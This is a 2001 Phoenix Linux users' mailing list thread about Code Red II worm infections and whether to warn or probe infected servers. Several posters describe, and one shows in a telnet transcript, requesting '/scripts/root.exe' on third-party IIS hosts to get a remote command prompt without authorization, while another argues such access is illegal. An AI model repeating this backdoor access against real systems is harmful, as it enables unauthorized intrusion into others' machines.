I thought an open door is like an open invitation... or is that just what my high school gym teacher just said... Chris ----- Original Message ----- From: "George Toft" To: Sent: Thursday, August 09, 2001 8:03 AM Subject: Re: CR worm infection attempts > If you are walking down the street, and see a house with the door > open, do you walk in to see if anyone is home? When you return, and > see the windows broken out, and the outside spray-painted, how do you > feel? I think this is a similar situation - if you walk in uninvited, > it's called "illegal entry" and you may be arrested. Likewise, testing > a site to see if it has been exploited is illegal as you were accessing > their computer in an unauthorized fashion. > > Could you have stopped the crimes in both cases? Maybe (if the owner > listened to you). Is it worth the risk to you, your reputation, and > your family? No. I am not selfish - I am placing my family ahead of > strangers, and they rely upon my income. I suggest you do the same - > just keep on walking, and make sure you have the safeguards of Fort > Knox at home. > > George > > > Derek Neighbors wrote: > > > > That is the problem. > > > > I looked at my logs out of curiosity. I was AMAZED at the figured. I > > took the first IP and hit it and checked for the root.exe exploit. Sure > > enough it was WIDE open. > > > > Now I had a DILEMMA on my hands. Do I notify this company or not? I had > > no malicous intent nor did I do anything. The 'good' in me wanted to > > notify them so that they were not 'toasted' by one will 'ill' intent. > > > > HOWEVER, I feared lawsuit, death and dismemberment. So I said not a word. > > I looked at thier website about 4 hours later and they were defaced. :( > > > > What kind of a world is it? I mean if I was walking down the street with > > my fly open, I would hope to God someone would tell me. However, I > > suppose even in that case you should be careful. I mean after all, > > noftifying someone that thier fly was open, means you were looking at > > thier crotch. If you were looking at their crotch you must have been > > wanting to rape them or harass them. > > > > Where does the silliness stop? > > > > -Derek > > > > On Wed, 8 Aug 2001, Kim Allen wrote: > > > > > I've been contacting the sites that my server logs shows that have been > > > hitting me with the code red signature and so far no one has bothered to > > > respond except for one. However that site has told me how secure they are > > > and how there is no way that they have any problems. When I sent them the > > > portions of my server logs showing they do have problem they threaten > > > legal action. Anyone else have had this type of response? > > > > > > > To answer your question... make sure you're hitting enter TWICE after > > > > the command. > > > > > > > > As a security guy myself, I'm deeply troubled by what I'm finding. > > > > Check it out: > > > > > > > > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80 > > > > Trying xxx.xxx.xxx.xxx... > > > > Connected to xxx.xxx.xxx.xxx. > > > > Escape character is '^]'. > > > > GET /scripts/root.exe HTTP/1.0 > > > > > > > > HTTP/1.1 200 OK > > > > Server: Microsoft-IIS/5.0 > > > > Date: Mon, 06 Aug 2001 04:22:13 GMT > > > > Content-Type: application/octet-stream > > > > Microsoft Windows 2000 [Version 5.00.2195] > > > > (C) Copyright 1985-1999 Microsoft Corp. > > > > > > > > c:\inetpub\scripts> > > > > > > > > >From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's > > > > that explains how I did it, and why they need to pay attention to > > > > security patches. :) > > > > > > > > Hopefully they won't take it the 'wrong' way. > > > > > > > > ~g~ > > > > > > > > On 05 Aug 2001 15:15:02 -0700, Craig White wrote: > > > > > Wayne Conrad wrote: > > > > > > > > > > > > On Sun, 05 August 2001, "J.Francois" wrote: > > > > > > > I got tired of counting and just started putting the info into my IDS page. > > > > > > > That way I can send complaints and point them to a URL so I don't have to > > > > > > > keep recreating the same data each time. > > > > > > > > > > > > Are you putting the IP's up too? Every one of the CRII infected boxes is rooted... I wonder about the goodness of publishing a list of known rooted boxes. > > > > > > Wayne > > > > > ________________________________________________ > > > > > > > > > > I've been trying that out > > > > > > > > > > telnet ipaddress_from_my_httpd_access_log 80 > > > > > > > > > > GET /scripts/root.exe HTTP/1.0 > > > > > > > > > > but I can't get a command prompt - what am I missing? > > > > > > > > > > Craig > > > > > ________________________________________________ > > > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail. > > > > > > > > > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us > > > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > > > > > > > > > > > > > > > > > ________________________________________________ > > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail. > > > > > > > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us > > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > > > > > > > > > > ________________________________________________ > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail. > > > > > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > > > > > > > ________________________________________________ > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail. > > > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > ________________________________________________ > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail. > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss >